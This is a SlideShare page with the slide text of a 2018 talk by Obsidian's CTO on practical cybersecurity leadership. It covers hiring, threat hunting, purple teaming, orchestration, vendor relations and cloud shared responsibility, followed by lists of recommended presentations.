SlideShare ist ein Scribd-Unternehmen logo

Focus Your Humans Where They Should Focus

Als PPTX, PDF herunterladen
Ben Johnson
Ben Johnson

Ben Johnson gave a presentation on lessons learned from his experience in cybersecurity. He discussed focusing security efforts inward by prioritizing people, processes, and technology. For people, he emphasized hiring for passion and focusing on high-performing teams. For processes, he recommended threat modeling, security hunting, and integrating red and blue teams. For technology, he suggested automation, orchestration, and focusing on capabilities over individual tools. He also advised approaching vendors, resellers, and analysts carefully by understanding their incentives and verifying solutions meet needs. Finally, he outlined responsibilities in cloud security and emphasized the importance of security fundamentals.

Technologie
1 von 51
Ben Johnson | Co-Founder & CTO March 7th, 2018 Practical Cyber Lessons from 500,000 Miles of Security Evangelism
@chicagoben | @obsidiansec Background Check // Ben Johnson Co-Founder and CTO, Obsidian Co-Founder and Former CTO, Carbon Black Former CNO/Cyber // NSA, CIA, DoD
AGENDA Introduction & Background Looking Inward People, Processes, Technology Looking Outward Vendors, Resellers, Analysts Cloud Call-Out Wrap-Up
@chicagoben | @obsidiansec Today’s Goal? TO SPARK CONTEMPLATION (and give you something to remember!) https://www.slideshare.net/chicagoben/
@chicagoben | @obsidiansec Cyber Scoreboard How are we doing?
@chicagoben | @obsidiansec Plenty of Challenges SKILLS GAP DEPLOY-AND-DECAY =LACK OF CYBER SELF-ESTEEM HUGE DATA ATTACKER SUCCESSES
@chicagoben | @obsidiansec Looking Inward People, Processes, & Technology
@chicagoben | @obsidiansec People - Team “Individuals disappear on high performing teams.” - NASA
@chicagoben | @obsidiansec People - Recruiting & Retaining “Hire for Passion, Train for Skill, Coach for Performance” “Passion, Capacity, Humility” Considerations: • Security Teams Need a Leader…and a Shield • Don’t hire just based on tool experience!! “Capacity” ... “Hire a bartender” • Mentoring & Growth Creative perks? New data? Coding to APIs? • Talent Density and Solving Challenging Problems https://venturebeat.com/2017/10/21/how-to-build-your-dynasty-hire-for-passion-train-for-skill-coach-for-performance/
@chicagoben | @obsidiansec People - Too Many Distractions
@chicagoben | @obsidiansec People - Essentialism “It is about making the wisest possible investment of your time and energy in order to operate at our highest point of contribution by doing only what is essential."” – Greg McKeown, Author of Essentialism
@chicagoben | @obsidiansec People - Journey vs. Destination Security teams focus where they have autonomy. They get comfortable in this never-ending journey vs. driving toward new destinations.
@chicagoben | @obsidiansec People - Culture “Culture eats strategy for breakfast” - P. Drucker
@chicagoben | @obsidiansec Processes - Extend IT an Olive Branch
@chicagoben | @obsidiansec Processes - Other Budgets
@chicagoben | @obsidiansec Processes - Adversarial & Threat Modeling Cybercriminals • Broad-based and targeted • Financially motivated • Getting more sophisticated Hactivists • Targeted and destructive • Unpredictable motivations • Generally less sophisticated Nation-States • Targeted and multi-stage • Motivated by data collection • Highly sophisticated with endless resources Insiders • Targeted and destructive • Unpredictable motivations • Sophistication varies
@chicagoben | @obsidiansec Processes - Hunting ▪ ALLOW FOR CREATIVITY. ALLOW HUNTERS TO ‘EXPLORE’ ▪ LOOK FOR RISK. LOOK FOR THREATS. ▪ EXCHANGE INFORMATION QUICKLY ▪ LOOK ACROSS THE STACK – CONTEXT ▪ DON’T WAIT FOR MACHINES ▪ MAKE SURE THERE ARE LESSONS LEARNED FROM EACH HUNT
@chicagoben | @obsidiansec Processes - Hunting Outcomes ▪ NOT ALWAYS MALWARE OR APT OR MALICIOUS ACTIVITY. ▪ WHERE TO HUNT? ▪ WHAT TO HUNT? ▪ WHERE ARE MY GAPS? ▪ WHERE ARE MY STRENGTHS? ▪ WHERE DO I NEED MORE CARE AND FEEDING?
@chicagoben | @obsidiansec Processes - Red + Blue = Purple • Sit red team next to blue team! • Once an attack or a technique works, have the blue team fix it (or update detection rules, etc), then immediately try again to make sure it is now prevented or detected • Drive Immediate Improvements
@chicagoben | @obsidiansec Processes: Engineers vs Analysts
@chicagoben | @obsidiansec TITLE TEXT Processes: Too Focused On Market Segments
@chicagoben | @obsidiansec Layers-Fu: Focus on Capabilities Hunting & Collaborating Integration & Automation Hardening & Prevention Retrospection Behavior Detection Attribute Detection Remediation Triage Visibility
@chicagoben | @obsidiansec Layers-Fu: ROI of Time? Hunting & Collaborating Integration & Automation Hardening & Prevention Retrospection Behavior Detection Attribute Detection Remediation Triage Visibility
@chicagoben | @obsidiansec Technology: Prioritize Collection Compromised (attacker present) Recovered (attacker expelled) Breach Discovered (attacker identified) DWELL TIME Proactively collecting data here is automated, efficient & conclusive Reactively collecting data here is time consuming, expensive & incomplete Compromised (attacker present) Recovered (attacker expelled) Breach Discovered (attacker identified) DWELL TIME You know what questions you’ll have… Make sure you can answer them! Setup the video camera before the robbery. Move Fast, Don’t Wait on Technology!
@chicagoben | @obsidiansec Technology: Visibility & Context Scanning Continuous Recording Continuous Recording + Intelligence Continuous Recording + Intelligence + Prevalence Continuous Recording + Intelligence + Prevalence + Relationships
@chicagoben | @obsidiansec TITLE TEXT Focus Your Humans Where They Should Focus! Alert where it makes sense!
@chicagoben | @obsidiansec TITLE TEXT
@chicagoben | @obsidiansec Technology : Visible, Surveyed Environment Nodes are processes & domains Clustered by affinity
@chicagoben | @obsidiansec JOIN, or DIEAUTOMATE, or DIE Technology: Integration & Automation
@chicagoben | @obsidiansec Technology: Orchestration Alert Generated Validate, Correlate, and Enhance Threat Intelligence Device History User Profile & Behaviors Alert Enriched Block IPs Kill Process, Preserve Evidence Reset Credentials Remediation Actions
@chicagoben | @obsidiansec Technology: Orchestration Case Study • 2 Security Engineers • 20 alerts a day • Manually processed 5 alerts (25%) • Data aggregation ~2 hours • Time to resolution ~7 days • 2 Security Engineers • 200 alerts day • Automatically process 100% of alerts • Data aggregation ~10 mins • Time to resolution is <1hr “Orchestration allowed us to add additional pieces to the stack to cover more gaps without an increase in headcount Today it is easier to install new security technology than hire people to run it, therefore, orchestration alleviates lack of available security talent.” Pre-Orchestration Post-Orchestration
@chicagoben | @obsidiansec Technology: Get Creative! (Open Source?)
@chicagoben | @obsidiansec Looking Inward: Quick Wins • Whitelist domains (top 10k?) • Disable Java & Flash!! • Or Patch (Java => 70% of alerts disappeared overnight) • Restrict Powershell to particular times of day! • Disable/Expire Admin Accounts Until You Need Them • Log every command line for common utilities • Can you “lock down” a particular division, group, etc? • Give your HVTs/VIPs iPads!
@chicagoben | @obsidiansec Looking Outward Vendors, Resellers, & Analysts
@chicagoben | @obsidiansec Security Industry != Security Community Proliferation Consolidation
@chicagoben | @obsidiansec Security Industry != Security Community
@chicagoben | @obsidiansec Vendors: Competing Priorities & Incentives • Big Guys vs. Small Guys • Terminology War; Press Coverage • Hard to Measure Effectiveness • Don’t fall for ‘competitive traps’ • YOUR PROBLEMS vs. product features • Force interoperability/integration • Partner w/ Early Stage Companies: best time to capture innovation and value
@chicagoben | @obsidiansec Resellers: Competing Priorities & Incentives • Margins & Relationships • Comfortable or Easy • Large Packages vs. Niche Deals • Verify that solutions match needs • Ask for new or holistic approaches • Get personal with resellers
@chicagoben | @obsidiansec Analysts: Competing Priorities & Incentives • Pay to Play • Scoring Based on Discussions • Gamed / Sponsored Evaluations • Not Operators • Understand the ‘why’ behind scoring • Ask which non-customer they like • Blogs vs. Reports
@chicagoben | @obsidiansec Cloud Call Out ( Do you understand the risks? )
@chicagoben | @obsidiansec Race to the Cloud! Lots of benefits of cloud adoption … we aren’t really here for that.
@chicagoben | @obsidiansec Cloud Security Responsibility Cloud Service Provider: responsible for security OF the cloud Customer: responsible for security IN the cloud
@chicagoben | @obsidiansec Cloud Security Responsibility Hackers want this!
@chicagoben | @obsidiansec Wrapping Up (Take-Aways and more)
@chicagoben | @obsidiansec Take-Aways: Looking Inward • People Hire for passion, train for skill, coach for performance Focus on ROI of Time • Processes Approach as an engineering problem Work with IT Concentrate on capabilities • Technology Integrate, Automate, and Orchestrate Blend Open Source & Commercial Focus on how technology enhances humans
@chicagoben | @obsidiansec Take-Aways: Looking Outward • Interacting with Vendors Don’t fall for competitive traps Partner w/ Early Stage Companies • Interacting with Resellers Verify that solutions match needs Get personal • Interacting with Analysts Understand the ‘why’ Utilize their relationships for introductions
@chicagoben | @obsidiansec Take-Aways: Cloud Call-Out Understand where, how, and why you are using cloud. Understand who is responsible. Providers need to do more. They could reduce users shooting themselves in the foot, improve default security levels, and better show surface area. (Please encourage them to do more!) The rest is on you: (Awareness, Auditing, Adaptation, Automation)! (and don’t forget hygiene.)
@chicagoben | @obsidiansec COMPROMISE IS INEVITABLE Attacker only has to be successful once, but defender has to stop 100% of attacks Once the attacker is in your environment, they should have to be 100% perfect.
@chicagoben | @obsidiansec What About Top 5? • Approach Security (Risk Management) as an Engineering Problem • Fix “Provision-and-Forget” and “Deploy-and-Decay” ▪ Reduce Entropy, Reduce Risk (I.T. is your best friend) ▪ Treat Your Users as Smart (Enable Your National Guard) ▪ Make it Fun
What’s Obsidian? (Other than a start-up in SoCal)
Ben Johnson, CTO ben@obsidiansecurity.com @chicagoben | @obsidiansec THANK YOU! https://www.slideshare.net/chicagoben/

Empfohlen

Lean Security
Lean SecurityLean Security
Lean SecurityBen Johnson
 
Threat Hunting, Detection, and Incident Response in the Cloud
Threat Hunting, Detection, and Incident Response in the CloudThreat Hunting, Detection, and Incident Response in the Cloud
Threat Hunting, Detection, and Incident Response in the CloudBen Johnson
 
IT Project Management by Todd Shyres.
IT Project Management by Todd Shyres.IT Project Management by Todd Shyres.
IT Project Management by Todd Shyres.Todd Shyres, MBA, PMP
 
Lean Startup Tools for Scrum Product Owners
Lean Startup Tools for Scrum Product OwnersLean Startup Tools for Scrum Product Owners
Lean Startup Tools for Scrum Product OwnersTechWell
 
Data Infrastructure for Your Retail Digital Strategy
Data Infrastructure for Your Retail Digital StrategyData Infrastructure for Your Retail Digital Strategy
Data Infrastructure for Your Retail Digital StrategyAtif Shaikh
 
Serverless Toronto helps Startups
Serverless Toronto helps StartupsServerless Toronto helps Startups
Serverless Toronto helps StartupsDaniel Zivkovic
 
KAI, the Information Specialist
KAI, the Information SpecialistKAI, the Information Specialist
KAI, the Information Specialistaik762
 
Microservices Workshop - Craft Conference
Microservices Workshop - Craft ConferenceMicroservices Workshop - Craft Conference
Microservices Workshop - Craft ConferenceAdrian Cockcroft
 

Empfohlen

Lean Security
Lean SecurityLean Security
Lean SecurityBen Johnson
 
Threat Hunting, Detection, and Incident Response in the Cloud
Threat Hunting, Detection, and Incident Response in the CloudThreat Hunting, Detection, and Incident Response in the Cloud
Threat Hunting, Detection, and Incident Response in the CloudBen Johnson
 
IT Project Management by Todd Shyres.
IT Project Management by Todd Shyres.IT Project Management by Todd Shyres.
IT Project Management by Todd Shyres.Todd Shyres, MBA, PMP
 
Lean Startup Tools for Scrum Product Owners
Lean Startup Tools for Scrum Product OwnersLean Startup Tools for Scrum Product Owners
Lean Startup Tools for Scrum Product OwnersTechWell
 
Data Infrastructure for Your Retail Digital Strategy
Data Infrastructure for Your Retail Digital StrategyData Infrastructure for Your Retail Digital Strategy
Data Infrastructure for Your Retail Digital StrategyAtif Shaikh
 
Serverless Toronto helps Startups
Serverless Toronto helps StartupsServerless Toronto helps Startups
Serverless Toronto helps StartupsDaniel Zivkovic
 
KAI, the Information Specialist
KAI, the Information SpecialistKAI, the Information Specialist
KAI, the Information Specialistaik762
 
Microservices Workshop - Craft Conference
Microservices Workshop - Craft ConferenceMicroservices Workshop - Craft Conference
Microservices Workshop - Craft ConferenceAdrian Cockcroft
 
Lean Hunting
Lean HuntingLean Hunting
Lean HuntingBen Johnson
 
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldSeeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldBen Johnson
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudInside Analysis
 
Surviving Your Tech Stack
Surviving Your Tech StackSurviving Your Tech Stack
Surviving Your Tech StackFITC
 
DevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsDevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsBen Hall
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!Steven Carlson
 
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation ProjectsAmazon Web Services
 
Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Michael Adcock
 
Acceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAcceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAlban Gérôme
 
A6 big data_in_the_cloud
A6 big data_in_the_cloudA6 big data_in_the_cloud
A6 big data_in_the_cloudDr. Wilfred Lin (Ph.D.)
 
What Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceWhat Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceAnnie Flippo
 
Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Rachel Harpley
 
Lean Analytics: How to get more out of your data science team
Lean Analytics: How to get more out of your data science teamLean Analytics: How to get more out of your data science team
Lean Analytics: How to get more out of your data science teamDigital Transformation EXPO Event Series
 
Data and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itData and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itHyoun Park
 
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0Amazon Web Services
 
Transforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerTransforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerCloudPassage
 
Agile Data Warehousing
Agile Data WarehousingAgile Data Warehousing
Agile Data WarehousingDavide Mauri
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtTechWell
 
The business case for contributing code
The business case for contributing codeThe business case for contributing code
The business case for contributing codeZivtech, LLC
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 

Weitere ähnliche Inhalte

Ähnlich wie Focus Your Humans Where They Should Focus

Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldSeeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldBen Johnson
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudInside Analysis
 
Surviving Your Tech Stack
Surviving Your Tech StackSurviving Your Tech Stack
Surviving Your Tech StackFITC
 
DevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsDevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsBen Hall
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!Steven Carlson
 
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation ProjectsAmazon Web Services
 
Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Michael Adcock
 
Acceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAcceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAlban Gérôme
 
What Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceWhat Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceAnnie Flippo
 
Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Rachel Harpley
 
Data and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itData and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itHyoun Park
 
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0Amazon Web Services
 
Transforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerTransforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerCloudPassage
 
Agile Data Warehousing
Agile Data WarehousingAgile Data Warehousing
Agile Data WarehousingDavide Mauri
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtTechWell
 
The business case for contributing code
The business case for contributing codeThe business case for contributing code
The business case for contributing codeZivtech, LLC
 

Ähnlich wie Focus Your Humans Where They Should Focus (20)

Lean Hunting
Lean HuntingLean Hunting
Lean Hunting
 
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First WorldSeeing through the Fog: Navigating the Security Landscape of a Cloud-First World
Seeing through the Fog: Navigating the Security Landscape of a Cloud-First World
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the Cloud
 
Surviving Your Tech Stack
Surviving Your Tech StackSurviving Your Tech Stack
Surviving Your Tech Stack
 
DevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable ProductsDevDay 2013 - Building Startups and Minimum Viable Products
DevDay 2013 - Building Startups and Minimum Viable Products
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
(SPOT205) 5 Lessons for Managing Massive IT Transformation Projects
 
Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)Fringe IA (InfoCamp Seattle 2013)
Fringe IA (InfoCamp Seattle 2013)
 
Acceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditableAcceptance, accessible, actionable and auditable
Acceptance, accessible, actionable and auditable
 
A6 big data_in_the_cloud
A6 big data_in_the_cloudA6 big data_in_the_cloud
A6 big data_in_the_cloud
 
What Managers Need to Know about Data Science
What Managers Need to Know about Data ScienceWhat Managers Need to Know about Data Science
What Managers Need to Know about Data Science
 
Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021Hacking hired [Forecasting 2021] Jan 2021
Hacking hired [Forecasting 2021] Jan 2021
 
Lean Analytics: How to get more out of your data science team
Lean Analytics: How to get more out of your data science teamLean Analytics: How to get more out of your data science team
Lean Analytics: How to get more out of your data science team
 
Data and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical itData and analytic strategies for developing ethical it
Data and analytic strategies for developing ethical it
 
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0(SEC402) Enterprise Cloud Security via DevSecOps 2.0
(SEC402) Enterprise Cloud Security via DevSecOps 2.0
 
Transforming the CSO Role to Business Enabler
Transforming the CSO Role to Business EnablerTransforming the CSO Role to Business Enabler
Transforming the CSO Role to Business Enabler
 
Agile Data Warehousing
Agile Data WarehousingAgile Data Warehousing
Agile Data Warehousing
 
From Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical DebtFrom Monoliths to Services: Paying Your Technical Debt
From Monoliths to Services: Paying Your Technical Debt
 
The business case for contributing code
The business case for contributing codeThe business case for contributing code
The business case for contributing code
 

Kürzlich hochgeladen

"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Kürzlich hochgeladen (20)

"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
